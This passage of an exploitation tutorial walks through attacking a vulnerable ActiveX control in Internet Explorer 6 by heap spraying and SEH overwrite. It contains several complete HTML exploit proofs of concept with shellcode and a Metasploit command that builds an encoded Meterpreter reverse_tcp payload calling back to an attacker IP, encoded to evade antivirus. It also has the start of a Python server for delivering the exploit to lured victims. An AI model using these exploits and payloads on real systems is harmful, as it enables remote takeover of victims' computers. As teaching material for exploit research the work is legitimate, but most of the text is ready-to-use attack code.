062113 1053 HeapSprayin481 Heap Spraying   Active X Controls Under Attack

 

Please have a look at the injected heap in the above image which is marked as sprayed. After running the Heap Spraying script in Internet Explorer, large chunks of NOPS + Shellcode is injected to Process Heap Memory.
 

Locating Shellcode In Memory

 

In this phase, we will try to find out where exactly our shellcode is placed in memory. In the Heap Spraying script, the shellcode is a string.
 

1
2
3
//shellcode = "HACKSYS!"
// don't forget to remove the backslashes
shellcode = unescape('%u\4148%u\4b43%u\5953%u\2153');

 

Open Internet Explorer and run the Heap Spraying script again, do not close the Internet Explorer’s window. Once the script has completed successfully, please launch Immunity debugger.
 

062113 1053 HeapSprayin491 Heap Spraying   Active X Controls Under Attack

 

In Immunity debugger, click on File and select “Attach“. Select the iexplore from the process list and click on “Attach“.
 

Once the process is attached to Immunity debugger, we will use Mona.py to find the shellcode in the Process Memory.
 

062113 1053 HeapSprayin501 Heap Spraying   Active X Controls Under Attack

 

1
!mona find –s "HACKSYS!"

 

Mona.py found 253 occurrence of string “HACKSYS!” in the memory. Let’s dump the address where the shellcode is located.
 

062113 1053 HeapSprayin511 Heap Spraying   Active X Controls Under Attack

 

Right click on the address and select “Dump at address“. We can see that shellcode is located after a block of NOPS.
 

Exploiting vulActiveX

 

In this phase we will proceed with exploiting the ActiveX control. We will try to find the offset to overwrite Next SEH and SE Handler.
 

Offsets To Overwrite

 

Let’s find out after how many bytes of junk data, we are able to overwrite Next SE and SE Handler.
 

Close all the instances of Internet Explorer before proceeding. Launch Immunity debugger, we will open iexplore.exe and then generate a unique pattern of 14356 bytes.
 

062113 1053 HeapSprayin521 Heap Spraying   Active X Controls Under Attack

 

Click on File –> Open.
 

Now, let’s generate a unique pattern of 14356 bytes to find the offset to overwrite Next SE Handler and SE Handler.
 

062113 1053 HeapSprayin531 Heap Spraying   Active X Controls Under Attack

 

1
!mona pc 14356

 

Open pattern.txt and copy the content, it’s located in Mona logs folder. Create a new HTML file and place the pattern of characters. In our case, it’s located at “C:\MonaLogs\iexplore\pattern.txt“.
 

062113 1053 HeapSprayin541 Heap Spraying   Active X Controls Under Attack

 

———- Exploit_PoC_HeapSpray_vulActiveX_SEH_1.html ———-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
<html>
<head>
    <title>vulActiveX.dll Heap Spray SEH Exploit</title>
    <object classid='clsid:C44CBF61-7844-4C4B-BC77-7643FD70848E' id='_vulActiveX'>
    </object>
    <script type="text/javascript" language="javascript">
        //==========================================//
        //  vulActiveX Heap Spraying SEH        //
        //                                          //
        //     HackSys Team - Panthera          //
        //       http://hacksys.vfreaks.com/        //
        //         hacksysteam@hotmail.com          //
        //                                          //
        //      Author: Ashfaq Ansari           //
        //   ashfaq_ansari1989@hotmail.com      //
        //                                          //
        //==========================================//

        //shellcode = "HACKSYS!"
        //please remove backslashes.
        shellcode = unescape('%u\4148%u\4b43%u\5953%u\2153');

        nops = unescape('%u\9090%u\9090');
        headersize = 20;

        //write the output to Internet Explorer's window
        document.write("<H2>vulActiveX.dll Heap Spray Attack</H2></br>");

        //create one block with nops
        document.write("Creating one block of memory with <b>NOPS</b>.</br>");
        slackspace = headersize + shellcode.length;
        while (nops.length < slackspace) nops += nops;
       fillblock = nops.substring(0, slackspace);

       //enlarge block with nops, size 0x50000
       document.write("Enlarging the memory with <b>NOPS</b> of size <b>0x5000</b>.</br>");
        block = nops.substring(0, nops.length - slackspace);
        while (block.length + slackspace < 0x50000) block = block + block + fillblock;

       document.write("Spraying <b>NOPS + SHELLCODE</b> <b>250</b> times.</br>");

        //spray 250 times : nops + shellcode
        memory = new Array();
        for (counter = 0; counter < 250; counter++) {
           memory[counter] = block + shellcode;

           //show the status of spray on Status bar
           window.status = "Spraying: " + Math.round(100 * counter / 250) + "% done";
       }

       document.write("Allocated <b>" + (block.length + shellcode.length).toString() + "</b> bytes.<br>");
        document.write("Heap Spraying completed successfully.<br>");
        window.status = "Launching Exploit";
        alert("Heap Spraying Done\n\n Launching Exploit");

        //place 14356 pattern of character. Truncated to save space.
        payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9" +
                  "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9" +
          "Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9" +
          "Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9" +
          "Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9" +
          "Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9" +
          "Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9" +
          "Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9" +
          "Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9" +
          "As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" +
          "Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9" +
          "Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9" +
          "Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9" +
          "Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9" +
          "Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9" +
          "Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9" +
          "Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9" +
          "Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9" +
          "Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9" +
                                 
        //pass the parameter to BufferOverflow method
        _vulActiveX.BufferOverflow(payload);
    </script>
</head>
<body>
</body>
</html>

 

Open the above HTML PoC and monitor the crash in Immunity debugger.
 

062113 1053 HeapSprayin551 Heap Spraying   Active X Controls Under Attack

 

Access Violation has occurred as expected. Let’s use Mona.py and find the offset to overwrite.
 

062113 1053 HeapSprayin561 Heap Spraying   Active X Controls Under Attack

 

From the Mona.py log, it clear that the offset to overwrite SEH Chain is 1164. Let’s have a look at the SEH Chain in Stack view.
 

062113 1053 HeapSprayin571 Heap Spraying   Active X Controls Under Attack

 

Building The Exploit

 

Now, let’s re-write the exploit PoC and try to make a working exploit.
 

———- Exploit_PoC_HeapSpray_vulActiveX_SEH_2.html ———-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<html>
<head>
    <title>vulActiveX.dll Heap Spray SEH Exploit</title>
    <object classid='clsid:C44CBF61-7844-4C4B-BC77-7643FD70848E' id='_vulActiveX'>
    </object>
    <script type="text/javascript" language="javascript">
        //==========================================//
        //  vulActiveX Heap Spraying SEH        //
        //                      //
        //     HackSys Team - Panthera      //
        //       http://hacksys.vfreaks.com/        //
        //         hacksysteam@hotmail.com      //
        //                      //
        //      Author: Ashfaq Ansari       //
        //   ashfaq_ansari1989@hotmail.com      //
        //                      //
        //==========================================//

        //shellcode = "HACKSYS!"
        //please remove backslashes
        shellcode = unescape('%u\4148%u\4b43%u\5953%u\2153');

        nops = unescape('%u9090%u9090');
        headersize = 20;

        //write the output to Internet Explorer's window
        document.write("<H2>vulActiveX.dll Heap Spray Attack</H2></br>");

        //create one block with nops
        document.write("Creating one block of memory with <b>NOPS</b>.</br>");
        slackspace = headersize + shellcode.length;
        while (nops.length < slackspace) nops += nops;
       fillblock = nops.substring(0, slackspace);

       //enlarge block with nops, size 0x50000
       document.write("Enlarging the memory with <b>NOPS</b> of size <b>0x5000</b>.</br>");
        block = nops.substring(0, nops.length - slackspace);
        while (block.length + slackspace < 0x50000) block = block + block + fillblock;

       document.write("Spraying <b>NOPS + SHELLCODE</b> <b>250</b> times.</br>");

        //spray 250 times : nops + shellcode
        memory = new Array();
        for (counter = 0; counter < 250; counter++) {
           memory[counter] = block + shellcode;

           //show the status of spray on Status bar
           window.status = "Spraying: " + Math.round(100 * counter / 250) + "% done";
       }

       document.write("Allocated <b>" + (block.length + shellcode.length).toString() + "</b> bytes.<br>");
        document.write("Heap Spraying completed successfully.<br>");
        window.status = "Launching Exploit";
        alert("Heap Spraying Done\n\n Launching Exploit");
       
    junkA = "";
    while(junkA.length < 1164) junkA += "A";

    next_seh = "BBBB";
    seh = "CCCC";
   
    junkB = "";
    while(junkB.length < 14356) junkB += "D";
       
    payload = junkA + next_seh + seh + junkB;

       //pass the parameter to BufferOverflow method
       _vulActiveX.BufferOverflow(payload);
   </script>
</head>
<body>
</body>
</html>

 

Let’s run the above exploit PoC and monitor the crash in Immunity debugger. We will check whether we have successfully overwritten Next SE and SE Handler with “BBBB” and “CCCC“.
 

Let’s have a look at the Immunity debugger.
 

062113 1053 HeapSprayin581 Heap Spraying   Active X Controls Under Attack

 

Wow, we have correctly overwritten Next SE and SE Handler. As this is a SEH based exploit, let’s see the comparison of Stack memory before and after overwrite in normal SEH based exploits.
 

062113 1053 HeapSprayin591 Heap Spraying   Active X Controls Under Attack

 

In normal SEH based exploitation, the program execution flow will look similar to the given below diagram.
 

062113 1053 HeapSprayin601 Heap Spraying   Active X Controls Under Attack

 

As we are using Heap Spraying technique with SEH exploitation, our approach to exploit this condition will be different. Heap Spraying will spray large chunks of NOPS + Shellcode into the Process Heap Memory; we will redirect the program execution flow to Heap Memory Block where NOPS + Shellcode have been placed in large chunks.
 

062113 1053 HeapSprayin611 Heap Spraying   Active X Controls Under Attack

 

Please have a look at the above diagram. In most of the cases 0×06060606 and 0x0a0a0a0a usually points into the NOPS block. Let’s consider 0x06060606 as the NOPS block in this scenario. Our plan is to overwrite the SE handler with 0×06060606 or 0x0a0a0a0a, so that the program execution is redirected NOPS block after the exception is passed. 0×06060606 and 0x0a0a0a0a usually points to memory address in Heap memory.
 

Let’s dump 0x06060606
 

062113 1053 HeapSprayin621 Heap Spraying   Active X Controls Under Attack

 

Let’s re-write the exploit PoC and replace the shellcode (string HACKSYS!) with shellcode to launch calc.exe in Windows. Next, change the value of seh in the exploit PoC from “CCCC” to “\x06\x06\x06\x06″. We will not change next_seh value as we do not need it at this time.
 

Before editing the exploit PoC, let’s generate our shellcode. We will need Metasploit for it.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
root@bt:~/Desktop# msfpayload windows/exec CMD=calc J
// windows/exec - 196 bytes
// http://www.metasploit.com
// VERBOSE=false, EXITFUNC=process, CMD=calc
// please remove backslashes
%u\e8fc%u\0089%u\0000%u\8960%u\31e5%u\64d2%u\528b%u\8b30%u\0c52%u\528b%u\8b14%u\2872%u\b70f
%u\264a%u\ff31%u\c031%u\3cac%u\7c02%u\c120%u\0dcf%u\c701%u\f0e2%u\5752%u\528b%u\8b10%u\3c42
%u\d001%u\408b%u\8578%u\74c0%u\014a%u\50d0%u\488b%u\8b18%u\2058%u\3ce3%u\8b49%u\8b34%u\d601
%u\ff31%u\c031%u\c1ac%u\0dcf%u\c701%u\e038%u\f475%u\7d03%u\3bf8%u\247d%u\e275%u\8b58%u\2458
%u\db66%u\4b0c%u\588b%u\011c%u\8bd3%u\8b04%u\d001%u\4489%u\2424%u\5b5b%u\5961%u\515a%u\e0ff
%u\5f58%u\8b5a%u\eb12%u\5d86%u\016a%u\00b9%u\0000%u\6850%u\8b31%u\876f%u\d5ff%u\f0bb%u\a2b5
%u\6856%u\95a6%u\9dbd%u\d5ff%u\063c%u\0a7c%u\fb80%u\75e0%u\bb05%u\1
root@bt:~/Desktop#

 

062113 1053 HeapSprayin631 Heap Spraying   Active X Controls Under Attack

 

———- Exploit_PoC_HeapSpray_vulActiveX_SEH_3.html ———-

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
<html>
<head>
    <title>vulActiveX.dll Heap Spray SEH Exploit</title>
    <object classid='clsid:C44CBF61-7844-4C4B-BC77-7643FD70848E' id='_vulActiveX'>
    </object>
    <script type="text/javascript" language="javascript">
        //==========================================//
        //       vulActiveX Heap Spraying SEH       //
        //                                          //
        //         HackSys Team - Panthera          //
        //       http://hacksys.vfreaks.com/        //
        //         hacksysteam@hotmail.com          //
        //                                          //
        //          Author: Ashfaq Ansari           //
        //      ashfaq_ansari1989@hotmail.com       //
        //                                          //
        //==========================================//

        //root@bt: ~#msfpayload windows/exec CMD=calc J
        // windows/exec - 196 bytes
        // http://www.metasploit.com
        // VERBOSE=false, EXITFUNC=process, CMD=calc
        // Don't forget to remove slashes
        shellcode = unescape("%u\e8fc%u\0089%u\0000%u\8960%u\31e5%u\64d2%u\528b%u\8b30%u\0c52" +
                             "%u\528b%u\8b14%u\2872%u\b70f%u\264a%u\ff31%u\c031%u\3cac%u\7c61" +
                             "%u\2c02%u\c120%u\0dcf%u\c701%u\f0e2%u\5752%u\528b%u\8b10%u\3c42" +
                             "%u\d001%u\408b%u\8578%u\74c0%u\014a%u\50d0%u\488b%u\8b18%u\2058" +
                             "%u\d301%u\3ce3%u\8b49%u\8b34%u\d601%u\ff31%u\c031%u\c1ac%u\0dcf" +
                             "%u\c701%u\e038%u\f475%u\7d03%u\3bf8%u\247d%u\e275%u\8b58%u\2458" +
                             "%u\d301%u\8b66%u\4b0c%u\588b%u\011c%u\8bd3%u\8b04%u\d001%u\4489" +
                             "%u\2424%u\5b5b%u\5961%u\515a%u\e0ff%u\5f58%u\8b5a%u\eb12%u\5d86" +
                             "%u\016a%u\858d%u\00b9%u\0000%u\6850%u\8b31%u\876f%u\d5ff%u\f0bb" +
                             "%u\a2b5%u\6856%u\95a6%u\9dbd%u\d5ff%u\063c%u\0a7c%u\fb80%u\75e0" +
                             "%u\bb05%u\1347%u\6f72%u\006a%u\ff53%u\63d5%u\6c61%u\0063");
        nops = unescape('%u\9090%u\9090');
        headersize = 20;

        //write the output to Internet Explorer's window
        document.write("<H2>vulActiveX.dll Heap Spray Attack</H2></br>");

        //create one block with nops
        document.write("Creating one block of memory with <b>NOPS</b>.</br>");
        slackspace = headersize + shellcode.length;
        while (nops.length < slackspace) nops += nops;
       fillblock = nops.substring(0, slackspace);

       //enlarge block with nops, size 0x50000
       document.write("Enlarging the memory with <b>NOPS</b> of size <b>0x5000</b>.</br>");
        block = nops.substring(0, nops.length - slackspace);
        while (block.length + slackspace < 0x50000) block = block + block + fillblock;

       document.write("Spraying <b>NOPS + SHELLCODE</b> <b>250</b> times.</br>");

        //spray 250 times : nops + shellcode
        memory = new Array();
        for (counter = 0; counter < 250; counter++) {
           memory[counter] = block + shellcode;

           //show the status of spray on Status bar
           window.status = "Spraying: " + Math.round(100 * counter / 250) + "% done";
       }

       document.write("Allocated <b>" + (block.length + shellcode.length).toString() + "</b> bytes.<br>");
        document.write("Heap Spraying completed successfully.<br>");
        window.status = "Launching Exploit";
        alert("Heap Spraying Done\n\n Launching Exploit");

        junkA = "";
        while (junkA.length < 1164) junkA += "A";


       next_seh = "BBBB";
       seh = "\x06\x06\x06\x06";

       junkB = "";
       while (junkB.length < 14356) junkB += "D";

       payload = junkA + next_seh + seh + junkB;

       //pass the parameter to BufferOverflow method
       _vulActiveX.BufferOverflow(payload);
   </script>
</head>
<body>
</body>
</html>

 

Our exploit is ready to be tested. Let’s restart iexplore.exe in Immunity debugger and launch the exploit PoC. If our calculation and assumptions are correct, we will see calc.exe being launched as soon as the shellcode is executed. Once the shellcode is executed, it might crash the browser.

 

I’m really excited at this point.
 

J Let’s hope for the best results and launch the exploit.
 

062113 1053 HeapSprayin641 Heap Spraying   Active X Controls Under Attack

 

As expected, Access Violation has occurred. Let’s pass the exception by pressing SHIFT + F9.
 

062113 1053 HeapSprayin651 Heap Spraying   Active X Controls Under Attack

 

Yeah, our shellcode got executed. Calc.exe has been launched as expected. This is very good news. We have successfully exploited our vulActiveX.dll.

Revision: We have used SEH exploitation with Heap Spraying the Process Memory. We have overwritten Structured Exception Handler with “\x06\x06\x06\x06″. 0x06060606, 0x0a0a0a0a and few others are predictable memory location where NOPS + Shellccode can be located. We have redirected the execution flow to Heap Memory Block, resulting execution of our shellcode to launch calc.exe in Windows Operating System (x86 architecture).
 

Let’s observe the given below diagram.
 

062113 1053 HeapSprayin661 Heap Spraying   Active X Controls Under Attack

 

As we are using Heap Spraying technique, we can ignore the calculation of offset to overwrite Next SEH and SE Handler. We can overflow the entire stack with “\x06\x06\x06\x06″, resulting Next SEH and SE Handler being overwritten with “\x06\x06\x06\x06″ automatically.
 

Let’s implement the above idea and re-write the exploit PoC.
 

———- Exploit_PoC_HeapSpray_vulActiveX_SEH_Final.html ———-

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
<html>
<head>
    <title>vulActiveX.dll Heap Spray SEH Exploit</title>
    <object classid='clsid:C44CBF61-7844-4C4B-BC77-7643FD70848E' id='_vulActiveX'>
    </object>
    <script type="text/javascript" language="javascript">
        //==========================================//
        //       vulActiveX Heap Spraying SEH       //
        //                                          //
        //         HackSys Team - Panthera          //
        //       http://hacksys.vfreaks.com/        //
        //         hacksysteam@hotmail.com          //
        //                                          //
        //          Author: Ashfaq Ansari           //
        //      ashfaq_ansari1989@hotmail.com       //
        //                                          //
        //==========================================//

        //Heading
        heading = ("<h4><pre><b><strong><big>" +
        "#######################################################\n" +
        "vulActiveX.dll ActiveX Buffer Overflow (Heap Spray SEH)\n" +
        "#######################################################\n" +
        "\t\tHackSys Team - Panthera\n" +
        "\t\t Author: Ashfaq Ansari\n" +
        "\t     http://hacksys.vfreaks.com\n" +
        "\t      hacksysteam@hotmail.com\n" +
        "#######################################################\n" +
        "\t     Tested on WinXPSP3 with IE6\n" +
        "#######################################################\n" +
        "</b></strong></big></pre></h4>");

        document.write(heading);
        //root@bt: ~#msfpayload windows/exec CMD=calc J
        // windows/exec - 196 bytes
        // http://www.metasploit.com
        // VERBOSE=false, EXITFUNC=process, CMD=calc
        //Don't forget to remove slashes
        shellcode = unescape("%u\e8fc%u\0089%u\0000%u\8960%u\31e5%u\64d2%u\528b%u\8b30%u\0c52" +
                             "%u\528b%u\8b14%u\2872%u\b70f%u\264a%u\ff31%u\c031%u\3cac%u\7c61" +
                             "%u\2c02%u\c120%u\0dcf%u\c701%u\f0e2%u\5752%u\528b%u\8b10%u\3c42" +
                             "%u\d001%u\408b%u\8578%u\74c0%u\014a%u\50d0%u\488b%u\8b18%u\2058" +
                             "%u\d301%u\3ce3%u\8b49%u\8b34%u\d601%u\ff31%u\c031%u\c1ac%u\0dcf" +
                             "%u\c701%u\e038%u\f475%u\7d03%u\3bf8%u\247d%u\e275%u\8b58%u\2458" +
                             "%u\d301%u\8b66%u\4b0c%u\588b%u\011c%u\8bd3%u\8b04%u\d001%u\4489" +
                             "%u\2424%u\5b5b%u\5961%u\515a%u\e0ff%u\5f58%u\8b5a%u\eb12%u\5d86" +
                             "%u\016a%u\858d%u\00b9%u\0000%u\6850%u\8b31%u\876f%u\d5ff%u\f0bb" +
                             "%u\a2b5%u\6856%u\95a6%u\9dbd%u\d5ff%u\063c%u\0a7c%u\fb80%u\75e0" +
                             "%u\bb05%u\1347%u\6f72%u\006a%u\ff53%u\63d5%u\6c61%u\0063");
        nops = unescape('%u\9090%u\9090');
        headersize = 20;

        //write the output to Internet Explorer's window
        document.write("<h2>vulActiveX.dll Heap Spray Attack</h2>");

        //create one block with nops
        document.write("Creating one block of memory with <b>NOPS</b>.</br>");
        slackspace = headersize + shellcode.length;
        while (nops.length < slackspace) nops += nops;
       fillblock = nops.substring(0, slackspace);

       //enlarge block with nops, size 0x50000
       document.write("Enlarging the memory with <b>NOPS</b> of size <b>0x5000</b>.</br>");
        block = nops.substring(0, nops.length - slackspace);
        while (block.length + slackspace < 0x50000) block = block + block + fillblock;

       document.write("Spraying <b>NOPS + SHELLCODE</b> <b>250</b> times.</br>");

        //spray 250 times : nops + shellcode
        memory = new Array();
        for (counter = 0; counter < 250; counter++) {
           memory[counter] = block + shellcode;

           //show the status of spray on Status bar
           window.status = "Spraying: " + Math.round(100 * counter / 250) + "% done";
       }

       document.write("Allocated <b>" + (block.length + shellcode.length).toString() + "</b> bytes.<br>");
        document.write("Heap Spraying completed successfully.<br>");
        window.status = "Launching Exploit";
        alert("Heap Spraying Done\n\n Launching Exploit");
       
        //overwrite the complete stack with "\x06\x06\x06\x06"
        //
        //          +------------------+
        //          | \x06\x06\x06\x06 |
        //          +------------------+
        //          | \x06\x06\x06\x06 | --------------------
        //          +------------------+                    |
        //          | \x06\x06\x06\x06 |                    V
        //          +------------------+            +-----------------+
        //          | \x06\x06\x06\x06 |            | NOP + SHELLCODE |
        //          +------------------+            +-----------------+
        //          | \x06\x06\x06\x06 |            | NOP + SHELLCODE |
        //          +------------------+            +-----------------+
        //          | \x06\x06\x06\x06 |            | NOP + SHELLCODE |
        //          +------------------+            +-----------------+
        //
        evil_payload = "";
        while (evil_payload.length < 14356) evil_payload += "\x06";

       //pass the parameter to BufferOverflow method
       _vulActiveX.BufferOverflow(evil_payload);
   </script>
</head>
<body>
</body>
</html>

 

It’s time to test the above exploit PoC. Let’s open iexplore.exe in the Immunity debugger. We need to check whether our exploit PoC is working as expected.

 

062113 1053 HeapSprayin671 Heap Spraying   Active X Controls Under Attack

 

As expected, Access Violation has occurred. Pass the exception to the program by pressing SHIFT + F9.

 

062113 1053 HeapSprayin681 Heap Spraying   Active X Controls Under Attack
 

Awesome, finally we did it. Our exploit PoC is working absolutely as expected. We have successfully exploited vulActiveX.dll and executed our shellcode.
 

062113 1053 HeapSprayin691 Heap Spraying   Active X Controls Under Attack

 

Am I A Hacker?

 

Post Exploitation

 

When software vulnerabilities are discovered, it’s very important to know the impact of the discovery on software users. The emphasis of this section is on the various methodologies used by Black Hats/Cyber Criminals/Script-Kiddies to gain unauthorized access to a Computer system by finding and exploiting vulnerabilities in software components.

We already know that our vulActiveX.dll is vulnerable to Heap Spraying attack. Let’s try to take advantage of this situation and completely re-write the exploit PoC and own a Windows box by triggering the vulnerability and exploiting it.

 

Scenario Assumption

 

In this paper, we will take a very simple scenario so the probability of exploitation is higher. For this paper, we will not deal with the mitigations to overcome these kinds of attacks like Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), etc.
 

We will assume the following configuration in victim’s Windows box.

  • Avast Free Anti-Virus 2012
  • Windows XP Service Pack 3 build 2600
  • Internet Explorer 6
  • Data Execution Prevention in OptIn mode

 

062113 1053 HeapSprayin701 Heap Spraying   Active X Controls Under Attack

 

Attacker has determined that victim is running vulnerable vulActiveX.dll which got shipped with 3rd party Internet Explorer 6 add-ons. Attacker grabbed a copy of vulActiveX.dll and has made a working exploit PoC to compromise victim’s Computer. After everything is setup, attacker will try to mislead the victim to browse port 80 on attacker’s machine where the exploit PoC is waiting for the victim to connect.
 

Meterpreter

 

Meterpreter is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that can help in post exploitation. Meterpreter can also be called as Meta-Interpreter; it works by using in memory DLL injection method. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus they remain undetected from standard Anti-Virus detection schemas. Meterpreter uses encrypted client-server communication channel.
 

Let’s have a look on how Meterpreter works.
 

062113 1053 HeapSprayin711 Heap Spraying   Active X Controls Under Attack

 

Meterpreter is a staged payload. We send Meterpreter first stage payload with our exploit PoC. Once the payload is executed in exploited process of victim’s computer, it connects back to the Metasploit Framework. Metasploit sends second stage Meterpreter payload with Meterpreter Server DLL.
 

Meterpreter second stage uses in memory DLL injection technique to inject the Meterpreter’s Server DLL to the exploited process. Hence, Metasploit and Meterpreter start communicating over encrypted channel.
 

Please Note: To know more about Meterpreter, please do read skape’s excellent paper on Metasploit Meterpreter. http://www.hick.org/code/skape/papers/meterpreter.pdf

 

Let’s move forward and generate Meterpreter payload using msflayload command and encode it to bypass Anti-Virus detection.
 

IP address of attacker’s box: 192.168.96.128
 

Open konsole and type in the below given command.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
 8   8                   888888                88888                    
 8   8 88888 8888 8   8  8      8    8 88888     8   8888 88888 8888888  
 88888 8   8 8  8 8   8  888888 8    8 8         8   8    8   8 8  8  8  
 8   8 88888 8    888888      8 888888 88888     8   8888 88888 8  8  8  
 8   8 8   8 8  8 8    8 8    8   88       8     8   8    8   8 8  8  8  
 8   8 8   8 8888 8    8 888888   88   88888     8   8888 8   8 8  8  8  

 [*] Welcome to HackSys Team - Panthera
 [*] Email:  hacksysteam@hotmail.com
 [*] Web:  http://hacksys.vfreaks.com/

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.96.128 R | msfencode -a x86 -c 10 -e x86/shikata_ga_nai -t js_le > /root/Desktop/meterpreter_js.txt

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)

[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)

[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)

root@bt:~#

 

We can find the generated payload in /root/Desktop/meterpreter_js.txt
 

Python Exploit PoC

 

Let’s re-write the exploit PoC in python with very simple inbuilt mini HTTP web server. We will replace the previously used windows/exec calc.exe shellcode with the newly generated windows/meterpreter/reverse_tcp shellcode which is located at /root/Desktop/meterpreter_js.txt
 

———- exploit_poc_vulactivex.py ———-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
#!/usr/bin/env python

#HackSys Team - Panthera
#Author: Ashfaq Ansari
#Email: hacksysteam@hotmail.com
#Website: http://hacksys.vfreaks.com/

#Thanks to:
#Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
#Peter Van Eeckhoutte (corelanc0d3r) https://www.corelan.be/
#Richard Brengle <brengle@charteRMI.net>

#This script has been tested on Windows XP SP3 IE 6 with BackTrack 5R1

import time, sys, subprocess
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler

try:
    import psyco
    psyco.full()
except ImportError:
    pass
 
#Color variables to be usd with print command
RED  = "\033[31m" # red
GREEN  = "\033[32m" # green
BLUE  = "\033[34m" # blue

#My Custom RequestHandler class
class myRequestHandler(BaseHTTPRequestHandler):
 try:
  def do_GET(self):
